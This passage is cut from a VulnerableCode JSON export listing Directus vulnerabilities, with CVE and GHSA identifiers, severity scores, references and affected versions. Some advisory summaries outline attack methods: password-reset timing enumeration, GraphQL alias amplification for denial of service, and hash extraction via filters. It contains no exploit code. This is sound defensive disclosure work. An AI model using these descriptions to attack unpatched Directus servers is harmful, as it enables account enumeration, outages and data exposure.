http://public2.vulnerablecode.io/api/vulnerabilities/201052?format=json","vulnerability_id":"VCID-9gba-zszk-p3h6","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-36031","reference_id":"","reference_type":"","scores":[{"value":"0.0026","scoring_system":"epss","scoring_elements":"0.495","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-36031"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36031","reference_id":"CVE-2022-36031","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36031"},{"reference_url":"https://github.com/advisories/GHSA-77qm-wvqq-fg79","reference_id":"GHSA-77qm-wvqq-fg79","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-77qm-wvqq-fg79"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79","reference_id":"GHSA-77qm-wvqq-fg79","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:45:00Z/"}],"url":"https://github.com/directus/d
irectus/security/advisories/GHSA-77qm-wvqq-fg79"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/78985?format=json","purl":"pkg:npm/directus@9.15.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-et4m-8y15-9fb9"},{"vulnerability":"VCID-eygf-cb4y-hqd3"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-szny-2sbf-v7de"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-v4vz-smcx-gygb"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.15.0"}],"aliases":["CVE-2022-36031","GHSA-77qm-wvqq-fg7
9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9gba-zszk-p3h6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/22527?format=json","vulnerability_id":"VCID-anfb-6kfn-a7h7","summary":"Directus Vulnerable to User Enumeration via Password Reset Timing Attack\nA timing-based user enumeration vulnerability exists in the password reset functionality. When an invalid reset_url parameter is provided, the response time differs by approximately 500ms between existing and non-existing users, enabling reliable user enumeration.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26185","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02691","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26185"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/e69aa7a5248c6e3e822cb1ac354dee295df90b2a","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/commit/e69aa7a5248c6e3e822cb1ac354dee295df90b2a"},{"reference_url":"https://github.com/directus/directus/pull/26485","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_e
lements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/pull/26485"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.14.1","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.14.1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26185","reference_id":"CVE-2026-26185","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26185"},{"reference_url":"https://github.com/advisories/GHSA-jr94-gj3h-c8rf","reference_id":"GHSA-jr94-gj3h-c8rf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jr94-gj3h-c8rf"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf","reference_id":"GHSA-jr94-gj3h-c8rf","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:5
7Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/72811?format=json","purl":"pkg:npm/directus@11.14.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.14.1"}],"aliases":["CVE-2026-26185","GHSA-jr94-gj3h-c8rf"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-anfb-6kfn-a7h7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/346608?format=json","vulnerability_id":"VCID-axx3-a6te-d3cw","summary":"Directus: Unauthenticated Denial of Service via GraphQL Alias Amplification of Expensive Health Check Resolver\n## Summary\n\nThe GraphQL specification permits a single query to repeat the same field multiple times using aliases, with each alias resolved independently by default. Directus did not deduplicate resolver invocations within a single request, meaning each alias triggered a full, independent execution of the underlying resolver.\n\nThe health check resolver ran all backend checks (database connectivity, cache, storage writes, and SMTP verification) on every invocation. 
Combined with unauthenticated access to the system GraphQL endpoint, this allowed an attacker to amplify resource consumption significantly from a single HTTP request, exhausting the database connection pool, storage I/O, and SMTP connections.\n\n## Fix\n\nA request-scoped resolver deduplication mechanism was introduced and applied broadly across all GraphQL read resolvers, both system and items endpoints. When multiple aliases in a single request invoke the same resolver with identical arguments, only the first call executes; all subsequent aliases share its result. This eliminates the amplification factor regardless of how many aliases an attacker includes in a query.\n\n## Impact\n\n- **Service degradation or outage:** Database connection pool exhaustion prevents all Directus operations for all users\n- **Storage I/O saturation:** Concurrent file writes can overwhelm disk I/O\n- **SMTP resource exhaustion:** Concurrent SMTP verification calls may overwhelm the mail server\n- **No authentication required:** Any network-accessible attacker can trigger this condition\n- **Single-request impact:** A single request is sufficient to cause significant resource consumption\n\n## Credit\n\nThis vulnerability was discovered and reported by 
[bugbunny.ai](https://bugbunny.ai).","references":[{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-6q22-g298-grjh","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-6q22-g298-grjh"},{"reference_url":"https://github.com/advisories/GHSA-6q22-g298-grjh","reference_id":"GHSA-6q22-g298-grjh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6q22-g298-grjh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188807?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["GHSA-6q22-g298-grjh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-axx3-a6te-d3cw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/306029?format=json","vulnerability_id":"VCID-bh2g-b9dd-d3d9","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53886","reference_id":"","reference_type":"","scores":[{"value":"0.0031","scoring_system":"epss","scoring_elements":"0.54434","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org
/data/v1/epss?cve=CVE-2025-53886"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/859f664f56fb50401c407b095889cea38ff580e5","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/commit/859f664f56fb50401c407b095889cea38ff580e5"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.9.0","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.9.0"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-f24x-rm6g-3w5v","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-f24x-rm6g-3w5v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53886","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvs
sv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53886"},{"reference_url":"https://github.com/directus/directus/pull/25354","reference_id":"25354","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/"}],"url":"https://github.com/directus/directus/pull/25354"},{"reference_url":"https://github.com/advisories/GHSA-f24x-rm6g-3w5v","reference_id":"GHSA-f24x-rm6g-3w5v","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-f24x-rm6g-3w5v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/195594?format=json","purl":"pkg:npm/directus@11.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0"}],"aliases":["CVE-2025-53886","GHSA-f24x-rm6g-3w5v"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bh2g-b9dd-d3d9"
},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/256072?format=json","vulnerability_id":"VCID-eb8p-vqjt-yfb8","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34708","reference_id":"","reference_type":"","scores":[{"value":"0.00324","scoring_system":"epss","scoring_elements":"0.55666","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34708"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/"}],"url":"https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34708","reference_id":"CVE-2024-34708","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34708"},{"reference_url":"https://github.com/advisories/GHSA-p8v3-m643-4xqx","reference_id":"GHSA-p8v3-m643-4xqx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p8v3-m643-4xqx"},{"reference_ur
l":"https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx","reference_id":"GHSA-p8v3-m643-4xqx","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/81014?format=json","purl":"pkg:npm/directus@10.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vu
lnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.0"}],"aliases":["CVE-2024-34708","GHSA-p8v3-m643-4xqx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eb8p-vqjt-yfb8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19598?format=json","vulnerability_id":"VCID-ejme-tqn4-byhk","summary":"Directus version number disclosure\n### Impact\n\nCurrently the exact Directus version number is being shipped in compiled JS bundles which are accessible without authentication. With this information a malicious attacker can trivially look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version.\n\n### Patches\n\nThe problem has been resolved in versions 10.8.3 and newer\n\n### 
Workarounds\n\nNone","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27296","reference_id":"","reference_type":"","scores":[{"value":"0.00437","scoring_system":"epss","scoring_elements":"0.63372","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27296"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/"}],"url":"https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27296","reference_id":"CVE-2024-27296","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27296"},{"reference_url":"https://github.com/advisories/GHSA-5mhg-wv8w-p59j","reference_id":"GHSA-5mhg-wv8w-p59j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5mhg-wv8w-p59j"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j","reference_id":"GHSA-5mhg-wv8w-p59
j","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/68026?format=json","purl":"pkg:npm/directus@10.8.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{
"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3"}],"aliases":["CVE-2024-27296","GHSA-5mhg-wv8w-p59j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ejme-tqn4-byhk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/17040?format=json","vulnerability_id":"VCID-et4m-8y15-9fb9","summary":"Exposure of Sensitive Information to an Unauthorized Actor\nDirectus is a real-time API and App dashboard for managing SQL database content. In versions prior to 9.16.0 users with read access to the `password` field in `directus_users` can extract the argon2 password hashes by brute forcing the export functionality combined with a `_starts_with` filter. This allows the user to enumerate the password hashes. Accounts cannot be taken over unless the hashes can be reversed which is unlikely with current hardware. This problem has been patched by preventing any hashed/concealed field to be filtered against with the `_starts_with` or other string operator in version 9.16.0. Users are advised to upgrade. 
